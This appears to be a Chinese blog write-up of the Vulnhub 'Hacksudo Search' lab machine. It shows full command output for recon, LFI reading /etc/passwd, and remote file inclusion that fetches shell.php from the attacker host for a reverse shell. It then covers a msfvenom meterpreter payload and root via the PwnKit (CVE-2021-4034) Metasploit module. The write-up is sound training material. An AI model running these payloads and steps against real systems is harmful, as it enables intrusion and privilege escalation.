Vulnhub之Hacksudo Search靶机详细测试过程(不同提权方法)

发布时间 2023-04-25 11:08:07作者: Jason_huawen

Hacksudo Search

识别目标主机IP地址

(kali㉿kali)-[~/Desktop/Vulnhub/HacksudoSearch]
└─$ sudo netdiscover -i eth1 -r 192.168.56.0/24
Currently scanning: 192.168.56.0/24   |   Screen View: Unique Hosts                                                                                        
                                                                                                                                                            
 3 Captured ARP Req/Rep packets, from 3 hosts.   Total size: 180                                                                                            
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
 -----------------------------------------------------------------------------
 192.168.56.1    0a:00:27:00:00:11      1      60  Unknown vendor                                                                                           
 192.168.56.100  08:00:27:f5:05:04      1      60  PCS Systemtechnik GmbH                                                                                   
 192.168.56.162  08:00:27:b8:ce:1e      1      60  PCS Systemtechnik GmbH     

利用Kali Linux的netdiscover工具识别目标主机的IP地址为192.168.56.162

NMAP扫描

┌──(kali㉿kali)-[~/Desktop/Vulnhub/HacksudoSearch]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.162 -oN nmap_full_scan 
Starting Nmap 7.92 ( https://nmap.org ) at 2023-04-24 21:30 EDT
Nmap scan report for bogon (192.168.56.162)
Host is up (0.00013s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 7b:44:7c:da:fb:e5:e6:1d:76:33:eb:fa:c0:dd:77:44 (RSA)
|   256 13:2d:45:07:32:83:13:eb:4e:a1:20:f4:06:ba:26:8a (ECDSA)
|_  256 21:a1:86:47:07:1b:df:b2:70:7e:d9:30:e3:29:c2:e7 (ED25519)
80/tcp open  http    Apache httpd 2.4.38 ((Debian))
|_http-title: HacksudoSearch
|_http-server-header: Apache/2.4.38 (Debian)
MAC Address: 08:00:27:B8:CE:1E (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 10.71 seconds
                                                                        

NMAP扫描结果表明目标主机有2个开放端口:22(ssh)、80(http)

获得Shell

──(kali㉿kali)-[~/Desktop/Vulnhub/HacksudoSearch]
└─$ curl http://192.168.56.162/robots.txt
/* find me * im number 1 search engine .
 just joking :) 
www.hacksudo.com
                                                                                                                                                             
┌──(kali㉿kali)-[~/Desktop/Vulnhub/HacksudoSearch]
└─$ nikto -h http://192.168.56.162
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.56.162
+ Target Hostname:    192.168.56.162
+ Target Port:        80
+ Start Time:         2023-04-24 22:26:53 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.4.38 (Debian)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ OSVDB-630: The web server may reveal its internal or real IP in the Location header via a request to /images over HTTP/1.0. The value is "127.0.0.1".
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ OSVDB-3268: /account/: Directory indexing found.
+ OSVDB-3092: /account/: This might be interesting...
+ OSVDB-3233: /icons/README: Apache default file found.
+ /.env: .env file found. The .env file may contain credentials.
+ 7915 requests: 0 error(s) and 9 item(s) reported on remote host
+ End Time:           2023-04-24 22:27:52 (GMT-4) (59 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested


      *********************************************************************
      Portions of the server's headers (Apache/2.4.38) are not in
      the Nikto 2.1.6 database or are newer than the known string. Would you like
      to submit this information (*no server specific data*) to CIRT.net
      for a Nikto update (or you may email to sullo@cirt.net) (y/n)? 

nikto发现目录/account/,该目录下虽然有众多文件,但是访问这些文件,返回均为空。

nikto另外发现了/.env,

┌──(kali㉿kali)-[~/Desktop/Vulnhub/HacksudoSearch]
└─$ curl http://192.168.56.162/.env      
APP_name=HackSudoSearch
APP_ENV=local
APP_key=base64:aGFja3N1ZG8gaGVscCB5b3UgdG8gbGVhcm4gQ1RGICwgY29udGFjdCB1cyB3d3cuaGFja3N1ZG8uY29tL2NvbnRhY3QK
APP_DEBUG=false
APP_URL=http://localhost

LOG_CHANNEL=stack

DB_CONNECTION=mysql
DB_HOST=127.0.0.1
DB_PORT=3306
DB_USERNAME=hiraman
DB_PASSWORD=MyD4dSuperH3r0!

该文件包含了数据库连接用户名和密码,但是该用户名不能用于SSH

┌──(kali㉿kali)-[~/Desktop/Vulnhub/HacksudoSearch]
└─$ ssh hiraman@192.168.56.162                                 
The authenticity of host '192.168.56.162 (192.168.56.162)' can't be established.
ED25519 key fingerprint is SHA256:dzS9ujCpu8ohIPbqCaxf4e6gi5YSgBrhAI8srwr1giU.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.56.162' (ED25519) to the list of known hosts.
hiraman@192.168.56.162's password: 
Permission denied, please try again.
hiraman@192.168.56.162's password: 

──(kali㉿kali)-[~/Desktop/Vulnhub/HacksudoSearch]
└─$ gobuster dir -u http://192.168.56.162 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.html,.txt,.bak,.js,.sh
===============================================================
Gobuster v3.5
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.56.162
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.5
[+] Extensions:              php,html,txt,bak,js,sh
[+] Timeout:                 10s
===============================================================
2023/04/24 22:31:27 Starting gobuster in directory enumeration mode
===============================================================
/.html                (Status: 403) [Size: 279]
/.php                 (Status: 403) [Size: 279]
/images               (Status: 301) [Size: 317] [--> http://192.168.56.162/images/]
/index.php            (Status: 200) [Size: 715]
/search.php           (Status: 200) [Size: 165]
/submit.php           (Status: 200) [Size: 165]
/assets               (Status: 301) [Size: 317] [--> http://192.168.56.162/assets/]
/account              (Status: 301) [Size: 318] [--> http://192.168.56.162/account/]
/javascript           (Status: 301) [Size: 321] [--> http://192.168.56.162/javascript/]
/robots.txt           (Status: 200) [Size: 75]
/LICENSE              (Status: 200) [Size: 1074]
/search1.php          (Status: 200) [Size: 2918]

Gobuster工具扫描出文件/search1.php,访问该文件,其中contact,作者给出提示,需要FUZZ参数,因此接下来用wfuzz工具进行FUZZING

┌──(kali㉿kali)-[~/Desktop/Vulnhub/HacksudoSearch]
└─$ wfuzz -c -u 'http://192.168.56.162/search1.php?FUZZ=../../../../../etc/passwd' -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt --hw 288
 /usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer                         *
********************************************************

Target: http://192.168.56.162/search1.php?FUZZ=../../../../../etc/passwd
Total requests: 220560

=====================================================================
ID           Response   Lines    Word       Chars       Payload                                                                                     
=====================================================================

000001129:   200        143 L    260 W      3797 Ch     "me"                         

FUZZ出参数名称为me

┌──(kali㉿kali)-[~/Desktop/Vulnhub/HacksudoSearch]
└─$ curl http://192.168.56.162/search1.php?me=../../../../../../etc/passwd


<body style="background-color:Navy;">
<!-- find me @hacksudo.com/contact @fuzzing always best option :)  --> 
<font color=white>

<div class="topnav">
  <a class="active" href="?find=home.php">Home</a>
  <a href="?Me=about.php">About</a>
  <a href="?FUZZ=contact.php">Contact</a>
  <div class="search-container">
    <form action="submit.php">
      <input type="text" placeholder="Search.." name="search">
      <button type="submit"><i class="fa fa-search"></i></button>
    </form>
  </div>
</div>

<div style="padding-left:16px">
  <h1><font color=red>HackSudo</font> Search box</h1>
  <p>JumpStation The web crawler with Google</p>
</div>

root:x:0:0:root:/root:/bin/bash
daemon:*:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:*:2:2:bin:/bin:/usr/sbin/nologin
sys:*:3:3:sys:/dev:/usr/sbin/nologin
sync:*:4:65534:sync:/bin:/bin/sync
games:*:5:60:games:/usr/games:/usr/sbin/nologin
man:*:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:*:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:*:8:8:mail:/var/mail:/usr/sbin/nologin
news:*:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:*:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:*:13:13:proxy:/bin:/usr/sbin/nologin
www-data:*:33:33:www-data:/var/www:/usr/sbin/nologin
backup:*:34:34:backup:/var/backups:/usr/sbin/nologin
list:*:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:*:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:*:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:*:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:*:100:65534::/nonexistent:/usr/sbin/nologin
systemd-timesync:*:101:102:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
systemd-network:*:102:103:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:*:103:104:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
hacksudo:x:1000:1000:hacksudo,,,:/home/hacksudo:/bin/bash
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
messagebus:x:104:110::/nonexistent:/usr/sbin/nologin
sshd:x:105:65534::/run/sshd:/usr/sbin/nologin
mysql:x:106:112:MySQL Server,,,:/nonexistent:/bin/false
monali:x:1001:1001:,,,:/home/monali:/bin/bash
john:x:1002:1002:,,,:/home/john:/bin/bash
search:x:1003:1003:,,,:/home/search:/bin/bash
                </form>
</font>
<font color=red><h2><marquee> <a href="https://www.hacksudo.com/">Visit --> www.hacksudo.com</marquee></h2></a> 
</font>
        </div>
</body>
</html>



看是否存在SSH私钥文件

http://192.168.56.162/search1.php?me=../../../../../../home/search/.ssh/id_rsa

经过测试3个普通用户均不存在ssh私钥文件。

接下来看是否有远程文件包含漏洞:

http://192.168.56.162/search1.php?me=http://192.168.56.230:8000/test.txt

经过尝试,目标存在远程文件包含漏洞,因此在Kali linux端准备好shell.php文件,并启动http.server

访问下述URL:

http://192.168.56.162/search1.php?me=http://192.168.56.230:8000/shell.php

在Kali linux上得到目标主机反弹回来的shell

┌──(kali㉿kali)-[~/Desktop/Vulnhub/HacksudoSearch]
└─$ sudo nc -nlvp 5555                                         
[sudo] password for kali: 
listening on [any] 5555 ...
connect to [192.168.56.230] from (UNKNOWN) [192.168.56.162] 55864
Linux HacksudoSearch 4.19.0-14-amd64 #1 SMP Debian 4.19.171-2 (2021-01-30) x86_64 GNU/Linux
 22:00:50 up 40 min,  0 users,  load average: 0.01, 1.18, 1.25
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ which python
/usr/bin/python
$ python -c 'import pty;pty.spawn("/bin/bash")'
www-data@HacksudoSearch:/$ cd /home
cd /home
www-data@HacksudoSearch:/home$ ls -alh
ls -alh
total 24K
drwxr-xr-x  6 root     root     4.0K Apr 15  2021 .
drwxr-xr-x 18 root     root     4.0K Apr 11  2021 ..
drwxr-x---  6 hacksudo hacksudo 4.0K Apr 15  2021 hacksudo
drwxr-x---  2 john     john     4.0K Apr 13  2021 john
drwxr-x---  2 monali   monali   4.0K Apr 13  2021 monali
drwxr-x---  2 search   search   4.0K Apr 15  2021 search

提权

利用msfvenom工具生成payload,将payload上传至目标主机/tmp目录,然后执行该文件

─(kali㉿kali)-[~/Desktop/Vulnhub/HacksudoSearch]
└─$ msfvenom -p  linux/x86/meterpreter/reverse_tcp  LHOST=192.168.56.230 LPORT=6666 -f elf -o escalate.elf


msf6 > use exploit/multi/handler 
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload linux/x86/meterpreter/reverse_tcp
payload => linux/x86/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > show options 

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Payload options (linux/x86/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target


msf6 exploit(multi/handler) > set LHOST 192.168.56.230
LHOST => 192.168.56.230
msf6 exploit(multi/handler) > set LPORT 6666
LPORT => 6666
msf6 exploit(multi/handler) > run

[*] Started reverse TCP handler on 192.168.56.230:6666 
[*] Sending stage (989032 bytes) to 192.168.56.162
[*] Meterpreter session 1 opened (192.168.56.230:6666 -> 192.168.56.162:33994) at 2023-04-24 22:51:21 -0400

meterpreter > background 
[*] Backgrounding session 1...
msf6 exploit(multi/handler) > search suggester

Matching Modules
================

   #  Name                                      Disclosure Date  Rank    Check  Description
   -  ----                                      ---------------  ----    -----  -----------
   0  post/multi/recon/local_exploit_suggester                   normal  No     Multi Recon Local Exploit Suggester


Interact with a module by name or index. For example info 0, use 0 or use post/multi/recon/local_exploit_suggester

msf6 exploit(multi/handler) > use  post/multi/recon/local_exploit_suggester
msf6 post(multi/recon/local_exploit_suggester) > show options 

Module options (post/multi/recon/local_exploit_suggester):

   Name             Current Setting  Required  Description
   ----             ---------------  --------  -----------
   SESSION                           yes       The session to run this module on
   SHOWDESCRIPTION  false            yes       Displays a detailed description for the available exploits

msf6 post(multi/recon/local_exploit_suggester) > set SESSION 1
SESSION => 1
msf6 post(multi/recon/local_exploit_suggester) > run

[*] 192.168.56.162 - Collecting local exploits for x86/linux...
[*] 192.168.56.162 - 167 exploit checks are being tried...
[+] 192.168.56.162 - exploit/linux/local/cve_2021_4034_pwnkit_lpe_pkexec: The target is vulnerable.
[+] 192.168.56.162 - exploit/linux/local/pkexec: The service is running, but could not be validated.
[+] 192.168.56.162 - exploit/linux/local/su_login: The target appears to be vulnerable.
[*] Running check method for exploit 48 / 48
[*] 192.168.56.162 - Valid modules for session 1:
============================

 #   Name                                                               Potentially Vulnerable?  Check Result
 -   ----                                                               -----------------------  ------------
 1   exploit/linux/local/cve_2021_4034_pwnkit_lpe_pkexec                Yes                      The target is vulnerable.
 2   exploit/linux/local/pkexec                                         Yes                      The service is running, but could not be validated.
 3   exploit/linux/local/su_login                                       Yes                      The target appears to be vulnerable.

选择提权模块,然后提权

msf6 post(multi/recon/local_exploit_suggester) > use exploit/linux/local/cve_2021_4034_pwnkit_lpe_pkexec
[*] No payload configured, defaulting to linux/x64/meterpreter/reverse_tcp
msf6 exploit(linux/local/cve_2021_4034_pwnkit_lpe_pkexec) > show options 

Module options (exploit/linux/local/cve_2021_4034_pwnkit_lpe_pkexec):

   Name          Current Setting  Required  Description
   ----          ---------------  --------  -----------
   PKEXEC_PATH                    no        The path to pkexec binary
   SESSION                        yes       The session to run this module on
   WRITABLE_DIR  /tmp             yes       A directory where we can write files


Payload options (linux/x64/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  10.0.2.15        yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   x86_64


msf6 exploit(linux/local/cve_2021_4034_pwnkit_lpe_pkexec) > set LHOST 192.168.56.230
LHOST => 192.168.56.230
msf6 exploit(linux/local/cve_2021_4034_pwnkit_lpe_pkexec) > set LPORT 8888
LPORT => 8888
msf6 exploit(linux/local/cve_2021_4034_pwnkit_lpe_pkexec) > set SESSION 1
SESSION => 1
msf6 exploit(linux/local/cve_2021_4034_pwnkit_lpe_pkexec) > run

[*] Started reverse TCP handler on 192.168.56.230:8888 
[*] Running automatic check ("set AutoCheck false" to disable)
[!] Verify cleanup of /tmp/.aqmsnondyug
[+] The target is vulnerable.
[*] Writing '/tmp/.esjvtiaf/vswplcef/vswplcef.so' (548 bytes) ...
[!] Verify cleanup of /tmp/.esjvtiaf
[*] Sending stage (3020772 bytes) to 192.168.56.162
[+] Deleted /tmp/.esjvtiaf/vswplcef/vswplcef.so
[+] Deleted /tmp/.esjvtiaf/.qbbgfqf
[+] Deleted /tmp/.esjvtiaf
[*] Meterpreter session 2 opened (192.168.56.230:8888 -> 192.168.56.162:40940) at 2023-04-24 22:55:08 -0400

meterpreter > shell
Process 1145 created.
Channel 1 created.
id 
uid=0(root) gid=0(root) groups=0(root),33(www-data)
cd /root
ls
notes.txt
root.txt
cat notes.txt
 _                _                  _                                 _
| |__   __ _  ___| | _____ _   _  __| | ___    ___  ___  __ _ _ __ ___| |__
| '_ \ / _` |/ __| |/ / __| | | |/ _` |/ _ \  / __|/ _ \/ _` | '__/ __| '_ \
| | | | (_| | (__|   <\__ \ |_| | (_| | (_) | \__ \  __/ (_| | | | (__| | | |
|_| |_|\__,_|\___|_|\_\___/\__,_|\__,_|\___/  |___/\___|\__,_|_|  \___|_| |_|

+-------------------------------------------------------------------------+
hacksudo search Box created By vishal waghmare
https://instagram.com/realvilu
try hacksudo other box
1.hacksudo 1.1
2.hacksudo 2  
3.hacksudo 3
4.hacksudo aliens
+----------------------------------+
this box name is hacksudo search.  
it's my pleasure to create such box .
+-----------------------------------+
if any query or want any kinda support you can contact us
email: info@hacksudo.com
       visal@hacksudo.com
web  : www.hacksudo.com  
 
+----------------------------+
hacksudo search vulnerability:

1. LFI ssh log poisioning / RFI on search1.php
2. after geting shell or you can do ls -la in /var/www/html
   in .env there is password hint
3. users are 3 to 4 so confused? do ssh one by one
   else do hydra with given password (MyD4dSuperH3r0!)
4. hacksudo ssh login done now do privileged escalation , there is searchinstall.c 
   searchinstall file which one have SUID permision and by read searchinstall.c 
   there you can read install command which is triggerd . so try path veriable 
   and you will get root access 
+++------rooted------------+++
yes you roted box thats why you read this
btw create your writeup how you solve this box and send to me
i love to read your way how you solve this box

+++---------+++-----------+++
Signed out
#vishal waghmare
cat root.txt
 _                _                  _         ____                      _     
| |__   __ _  ___| | _____ _   _  __| | ___   / ___|  ___  __ _ _ __ ___| |__  
| '_ \ / _` |/ __| |/ / __| | | |/ _` |/ _ \  \___ \ / _ \/ _` | '__/ __| '_ \ 
| | | | (_| | (__|   <\__ \ |_| | (_| | (_) |  ___) |  __/ (_| | | | (__| | | |
|_| |_|\__,_|\___|_|\_\___/\__,_|\__,_|\___/  |____/ \___|\__,_|_|  \___|_| |_|
You Successfully Hackudo search box 
rooted!!!

flag={9fb4c0afce26929041427c935c6e0879}